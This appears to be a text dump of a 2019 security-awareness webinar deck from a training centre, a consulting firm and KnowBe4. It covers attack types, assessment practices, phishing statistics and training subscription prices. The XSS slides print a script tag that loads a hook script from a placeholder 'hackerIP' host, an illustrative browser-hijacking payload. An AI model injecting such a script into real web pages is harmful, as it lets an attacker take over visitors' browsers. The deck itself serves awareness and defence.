Upload
others
View
0
Download
0
Embed Size (px)
Citation preview
Welcome!
System Source Pizza Webinar
Security AwarenessSeptember 26, 2019
Email:
Michelle Robinson – Learning Center Director
Email: [email protected]
Agenda Welcome from Michelle Robinson, System Source Learning Center Director
and Shawn Duffy, President of Duffy Consulting Services, LLC
The importance of cyber security – Why security is still a problem
Types of attacks
Best practices for implementing Cyber Security – Why outsourcing is good practice
Assessment vs. scanning
The important role of the end-user
Q & A
Evaluation @ end of webinar & via email
If it hasn’t arrived by 12:15
Please double check with your receptionist
Then call / email Mike Jones:
[email protected] OR 410-771-5544 x4355(we are recording the webinar – so don’t think twice about stepping away
for a few minutes to go pick it up at your front desk!
We Hope You
are Enjoying
Your Pizza!!
During the Webinar…
Audio – In presentation mode until end
Control Panel
View webinar in full screen mode
Feel Free to submit written questions
Open Q & A at the end
(please mute when not speaking)
Survey at conclusion of webinar
Shawn DuffyPrincipal
Duffy Compliance Services
Duffy Consulting Services (DCS)Cybersecurity Analysts help prevent attacks through their expertise and knowledge of threats and security controls.
Security controls:Safeguards or countermeasures to avoid, detect, counteract, or minimize security risks to physical property, information, computer systems, or other assets.
Take the guesswork out of how to secure your environment
DCS = Cybersecurity AnalystSo why is security still a problem?
What exactly am I buying?
Security is not a component to making money
Security is not mandated – it is often considered overhead
What are the long-term costs?
How much I afford?
Businesses have a different focus
DCS = Cybersecurity AnalystSo why is security still a problem?
Security is like insurance
What is my risk-to-reward ratio?
Just a little security is fine. It’s not like I am forced to buy it.
DCS = Cybersecurity AnalystWhat about Compliance?
Compliance = Driven by “Check the Box”
“Can we just say we do it and figure out how later if we get audited?”
Compliance = the minimum set of security controls required
DCS = Cybersecurity Analyst“Tried & True” method to secure the environment
Is that enough?
DCS = Cybersecurity AnalystTypes of Attacks
Impersonation
MitM
Session Hijacking
XSS
Privilege Escalation
Backdoors & Rootkits
Ransomware/Phishing
Ransomware / Phishing
Ransomware / Phishing
Ransomware / Phishing
Ransomware / Phishing
MitM attack
MitM attack
MitM attack
MitM attack
MitM attack
MitM attack
Cross Site Scripting (XSS)
<script src="http://hackerIP:3000/hook.js" type="text/javascript"></script>
Cross Site Scripting (XSS)
<script src="http://hackerIP:3000/hook.js" type="text/javascript"></script>
DCS = Cybersecurity AnalystHow do you know your secure?
What the client gets using this method?
If outsourced, a hefty bill
CVSS scored results with little to do with your environment
Questions how to proceed
The cheap way:
Buy a scanner
Learn to run scans
Print out huge canned reports
Figure out what’s important
DCS = Cybersecurity AnalystBest Practices – Threat Assessments
Subject Matter Expert (SME) way:Baselines
Information Gathering (including scans)
Data Analysis
Security Controls and Risk Analysis
Customized reporting and presentation
Findings based on the environment
Plan of Action
Building robustness into the environment
Prepares for Penetration Testing
DCS = Cybersecurity AnalystBest Practices – Assessments
Information GatheringInfrastructure documentation
Security documentation
Network and host-based logs
Rulesets
Configuration and Configuration Management
Network traffic and metrics
Approved Ports, Protocols, and Services
Vulnerabilities
Web Application information
Wireless information
DCS = Cybersecurity AnalystBest Practices – Assessments
Review and AnalysisDetermines gaps in security controls
Determines impacts to the business
Penetration TestingSystem toleration to real-world attacks
Sophistication of attacker matters
Social Engineering (Phishing, Backdoors)
Password cracking
Wi-Fi access
Tests Countermeasures
Tests Detection and Response capabilities
DCS = Cybersecurity AnalystBest Practices – Assessments
ReportingFindings
Supporting Documentation
Recommendations
Briefings and Presentations
RemediationPlan of Action
Metrics to measure results
Roles & Responsibilities
Re-evaluations
DCS = Cybersecurity AnalystBest Practices – Assessments
Cost effective solution with progress milestones
Preparation for Pen Testing against the system
Answers on how to proceed
Results that are specific to your environment
Technical Support on conducting remediation
Re-evaluations confirming remediation tasks
Metrics to track security progress
What the client gets using this method?
Duffy Compliance Services
Security Compliance ServicesNIST-based such as DFARS CUI, HIPAA, FISMA
E.U. GDPR and U.S. State Privacy Acts (NYDFS & CCPA)
Security Policy and Procedure Development
Threat Management
Network Assessments
Web Application Assessments
Wireless Assessments
Continuous Monitoring
Security Awareness Training
Michelle RobinsonLearning Center Director
System Source
System Source and KnowBe4
Partnering to deliver high quality training and phishing tests
About KnowBe4
• World’s most popular Security Awareness Training and Simulated Phishing platform
• Training based on Kevin Mitnick’s 30+ years’ experience (The Dark Side Hacker)
Gartner peer insights puts KnowBe4 at the top of the list for overall rating including:
• Product capabilities• Customer experience• Willingness to recommend
We’ve helped 5,103
customers use KnowBe4!
KnowBe4 Recognized by Gartner as a Leader – 3 Years in a Row
Magic Quadrant for Security
Awareness Computer-Based
Training 2019
Why We Phish and Train
A staggering
91%of successful data
breaches start with a spear phishing attack
Users Are the Last Line of Defense
• 91% of successful data breaches start with a spear phishing attack
• 30% of data breaches are caused by repeat offenders from within the organization
Why We Phish and Train
2019 Verizon Report Findings
There is good news!
Phish breach rates are going down.
Why?
2019 Verizon Report FindingsTop Breaches:
Phishing - #1
Use of Stolen Credentials
Backdoors or C2 (Command and Control)
Top Hacking Techniques:
Email is the #1 delivery method
Office Document is the #1 file type
Phishing is the #1 technique
Human is the #1 target
CEO Fraud
Phishing Test Click Rate by Industry
Our Approach
Baseline Testing
We provide baseline testing to assess the Phish-prone percentage of your users through a free simulated phishing
attack.
Train Your Users
The world's largest library of security awareness training content; including interactive modules, videos, games, posters
and newsletters. Automated training campaigns with scheduled reminder emails.
Phish Your Users
Best-in-class, fully automated simulated phishing attacks, hundreds of templates with unlimited usage, and community
phishing templates.
See The Results
Enterprise-strength reporting, showing stats and graphs for both training and phishing, ready for management. Show the
great ROI!
Baseline Testing
4 templates for your free baseline phishing test
O365
Exchange
Gsuite
Network password
KnowBe4 Training Modules
Silver – Basic training modules, simulated testing, reporting
Gold – Silver, plus intermediate training content, Email Exposure Check (EEC)
reports, vishing tests
Platinum – Silver, Gold, advanced phishing features; Smart Groups, Reporting
APIs, security roles, Social Engineering Indicator landing pages
Diamond – Silver, Gold, Platinum, advanced training content; full access to 700+
items including interactive modules, videos, games, posters and newsletters.
World’s Largest Library of Security Training Content In 4 Libraries
Most Common Phishing Lures
Most Common Phishing Lures
Sample Phishing Tests
Sample Phishing Tests
2019 Phishing By Industry Benchmarking Study
KnowBe4 analyzed data from nearly nine million users across 18,000 organizations with over 20 million simulated phishing security tests across nineteen different industries.
2019 Phishing By Industry Benchmarking Study
Results after 90 Days
2019 Phishing By Industry Benchmarking StudyResults after training and phishing for 1 year
Reporting
Reporting
0%
5%
10%
15%
20%
25%
30%
Phis
h P
rone
%
Training Impact on Phish Prone Staff52 person sample
Training
implemented
for those
failingNew hires
without
training
Value Proposition:
Risk and Operational Expenses
RISK• Reduced malware infections
• Reduced data loss
• Reduced potential cyber-theft
• Users have security top of mind
OPEX• Reduced help desk calls
• Reduced cleaning and re-imaging of machines
• Reduced downtime, increased user productivity
• Real ROI: Forrester's Total Economic Impact™ on
KnowBe4 reports a 127% ROI with a one-month
payback
Social Engineering is
information security’s weakest
link.”
– Kevin Mitnick, ‘The World’s Most Famous Hacker’, IT
Security Consultant
“11
Subscription Levels and Pricing
Silver Level
Admin Management Console
Unlimited Phishing Security Tests
Automated Security Awareness Program
Training Access Level I
Automated Training Campaigns
Crypto-Ransom Guarantee
Phish Alert Button
Active Directory Integration
Phishing Reply Tracking
Security ‘Hints & Tips’
Gold Level
Training Access Level II
Monthly Email Exposure Check
Vishing Security Test (voice mail)
Platinum Level
“Automated Human Pentesting”
USB Drive Test
Vulnerable Browser Plugin Detection
Priority Level Support
Social Engineering Indicators
Diamond Level
Training Access Level III
AIDA Artificial (AI Agent)
Intelligence-driven Agent BETA
Seats (Per Year) Corporate Education/Non-Profit
25-50 $17.00-$29.50 $15.30-$26.55
51-100 $15.00-$26.50 $13.50-$23.85
101-500 $11.00-$20.50 $9.90-$18.45
501-1000 $10.00-$19.00 $9.00-$17.10
Optional Setup Fee for steps 1-5 is $20/person to a maximum of $1,000
Thank you!
Q&APlease “Type in your
question”
& we will read your question
and answer☺